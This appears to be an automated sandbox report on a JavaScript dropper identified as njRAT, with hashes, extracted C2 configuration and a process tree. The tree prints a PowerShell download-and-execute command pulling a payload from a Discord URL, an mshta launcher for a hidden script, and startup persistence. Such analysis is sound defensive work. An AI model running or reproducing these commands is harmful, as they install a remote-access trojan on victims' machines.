Overview

overview

10

Static

static

34ce23e0ca...436.js

windows7_x64

10

34ce23e0ca...436.js

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    02-12-2021 02:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    34ce23e0cac1eb85e253f52b87c53436.js

  • Size

    256B

  • MD5

    34ce23e0cac1eb85e253f52b87c53436

  • SHA1

    fbc026960fc1009eae89f7506276a5e153ec58ec

  • SHA256

    ba2680549e33524c3b96c4b2be01c47297e977fe7532034936d8baa4f6dc3104

  • SHA512

    488b7d7cc0a3a723273f4bac17f4b45daa9c894d03af15b6c14e84d9f9b4ee3fa7d263b03fb3c12c78361a4a9d92b77a6e7a25e323b9494e937ba1ca6be92c9d

Score
10/10
njratnyan cattrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://cdn.discordapp.com/attachments/908377323814916189/915315815404953630/yuniiii.txt

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

yuni2022.duckdns.org:2000

Mutex

4ab2234479534

Attributes
  • reg_key

    4ab2234479534

  • splitter

    @!#&^%$

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

    trojannjrat
  • Blocklisted process makes network request 1 IoCs
  • Drops startup file 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 33 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\34ce23e0cac1eb85e253f52b87c53436.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2668
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass iex ((New-Object Net.WebClient).DownloadString('https://cdn.discordapp.com/attachments/908377323814916189/915315815404953630/yuniiii.txt'))
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3208
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:400
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\SystemLogin.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1192
          • C:\Windows\system32\mshta.exe
            mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'"", 0:close")
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2636
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'
              6⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3600
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                7⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1812

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    MD5

    ea6243fdb2bfcca2211884b0a21a0afc

    SHA1

    2eee5232ca6acc33c3e7de03900e890f4adf0f2f

    SHA256

    5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8

    SHA512

    189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    MD5

    13f5ec3eb93cedd9083c8ce2344637a2

    SHA1

    fff4333bb46e2bb4634c443fbd1d33b6c30a80de

    SHA256

    c7e1067ed56fcbbbc8202970a5b78d0c8933169296964e063564f33228209080

    SHA512

    c3346153108cd3e073a19d82a271f334cd531cd136a02d5cd5ca3ad60171ab0ee93422dceab96dfea09430a91957c9bc29389be124ada9de88a2b068522cbc55

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS
    MD5

    558a8b7b3fdef4ca79110f8cfd126694

    SHA1

    d6e96ca27f701b3f4c24885dacd14c762a9d36b0

    SHA256

    38c9b7098371b39e61a6dcf78370dddf47f4d2be2c32704a2a0310b76c52c0f7

    SHA512

    37d6d72d5f518aaf1cf37154ed75aec7c7f11677508874eb3c3cbf44ca0ebeb22112dfa5f45a2f5d821604c521092ef768016d83f948444a9ff2e2a812d1c283

    Download Submit
  • C:\Users\Admin\AppData\Roaming\SystemLogin.bat
    MD5

    7f85382953fde20b101039d48673dbd2

    SHA1

    5ebaa67f5862b2925d9029f4761b7e2ce9a99dd9

    SHA256

    fde417ad1b13a97acfa8e409789a92c4c3ddf6303851337ca31b94bfac634e4f

    SHA512

    6e93b74237844e1f78cd3ae64c0a00702c0b1aa1febda2feb52ca99b8a58ab2efd0c7b8351f040bf56a8bc1a8f5b1f57c4a9ffed46f8a2f9cba898e8e138ce46

    Download Submit
  • C:\Users\Public\myScript.ps1
    MD5

    b7ce758a456d759c9c8d9d165de473bc

    SHA1

    eb07b9f9a21b12945cd461d970b925698183b8f5

    SHA256

    0d44b8e8222a09eecef416a78409757ac190eae8bd7c0ceb2880791eedeec295

    SHA512

    8c239aa579b8e3875a271a730755c8ee2f83ac72b248270090a8bc025850ac2bd81100dac6118935a10ab686f7e295d599ee99a94779446db5b9cc30110cea04

    Download Submit
  • memory/400-151-0x0000000000000000-mapping.dmp
    Download
  • memory/1192-155-0x0000000000000000-mapping.dmp
    Download
  • memory/1812-190-0x000000000040676E-mapping.dmp
    Download
  • memory/1812-197-0x0000000005340000-0x0000000005341000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1812-195-0x0000000005940000-0x0000000005941000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1812-194-0x00000000053A0000-0x00000000053A1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1812-189-0x0000000000400000-0x000000000040C000-memory.dmp
    Filesize

    48KB

    Download
  • memory/2636-157-0x000001EF460D8000-0x000001EF460E0000-memory.dmp
    Filesize

    32KB

    Download
  • memory/2636-156-0x0000000000000000-mapping.dmp
    Download
  • memory/3208-134-0x000001D76C050000-0x000001D76C052000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3208-123-0x000001D768020000-0x000001D768022000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3208-129-0x000001D768020000-0x000001D768022000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3208-127-0x000001D7698D0000-0x000001D7698D2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3208-152-0x000001D768020000-0x000001D768022000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3208-128-0x000001D7698D3000-0x000001D7698D5000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3208-126-0x000001D76C0C0000-0x000001D76C0C1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3208-125-0x000001D768020000-0x000001D768022000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3208-124-0x000001D768020000-0x000001D768022000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3208-133-0x000001D7698D6000-0x000001D7698D8000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3208-115-0x0000000000000000-mapping.dmp
    Download
  • memory/3208-122-0x000001D768020000-0x000001D768022000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3208-121-0x000001D76BF10000-0x000001D76BF11000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3208-120-0x000001D768020000-0x000001D768022000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3208-119-0x000001D768020000-0x000001D768022000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3208-118-0x000001D768020000-0x000001D768022000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3208-116-0x000001D768020000-0x000001D768022000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3208-117-0x000001D768020000-0x000001D768022000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3600-158-0x0000000000000000-mapping.dmp
    Download
  • memory/3600-168-0x000001B84A710000-0x000001B84A712000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3600-169-0x000001B84A710000-0x000001B84A712000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3600-170-0x000001B84A710000-0x000001B84A712000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3600-167-0x000001B84A710000-0x000001B84A712000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3600-174-0x000001B84A7A3000-0x000001B84A7A5000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3600-173-0x000001B84A7A0000-0x000001B84A7A2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3600-176-0x000001B84A710000-0x000001B84A712000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3600-180-0x000001B866770000-0x000001B866772000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3600-185-0x000001B866780000-0x000001B866785000-memory.dmp
    Filesize

    20KB

    Download
  • memory/3600-186-0x000001B84A7A6000-0x000001B84A7A8000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3600-187-0x000001B866790000-0x000001B866793000-memory.dmp
    Filesize

    12KB

    Download
  • memory/3600-188-0x000001B84A710000-0x000001B84A712000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3600-164-0x000001B84A710000-0x000001B84A712000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3600-163-0x000001B84A710000-0x000001B84A712000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3600-191-0x000001B84A710000-0x000001B84A712000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3600-162-0x000001B84A710000-0x000001B84A712000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3600-161-0x000001B84A710000-0x000001B84A712000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3600-160-0x000001B84A710000-0x000001B84A712000-memory.dmp
    Filesize

    8KB

    Download